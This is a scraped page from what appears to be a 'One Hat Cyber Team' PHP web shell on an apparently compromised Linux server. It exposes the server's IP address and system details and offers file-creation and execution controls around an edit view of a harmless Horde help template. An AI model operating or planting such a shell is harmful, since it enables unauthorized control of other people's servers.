⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.50
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
templates
/
help
/
Edit File: index.inc
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "DTD/xhtml1-frameset.dtd"> <html> <head> <title><?php echo _("Help") ?></title> </head> <frameset cols="<?php echo ($rtl ? '*,' : '') . '200' . ($rtl ? '' : ',*') ?>" id="horde_help_frame"> <?php if (!$rtl): ?> <frame name="help_sidebar" src="<?php echo $sidebar_url ?>" scrolling="auto" /> <?php endif; ?> <frameset rows="30,*"> <frame name="help_menu" id="help_menu" frameborder="0" scrolling="no" src="<?php echo $menu_url ?>" /> <frame name="help_main" id="help_main" frameborder="0" src="<?php echo $main_url ?>" /> </frameset> <?php if ($rtl): ?> <frame name="help_sidebar" src="<?php echo $sidebar_url ?>" scrolling="auto" /> <?php endif; ?> </frameset> </html>
Simpan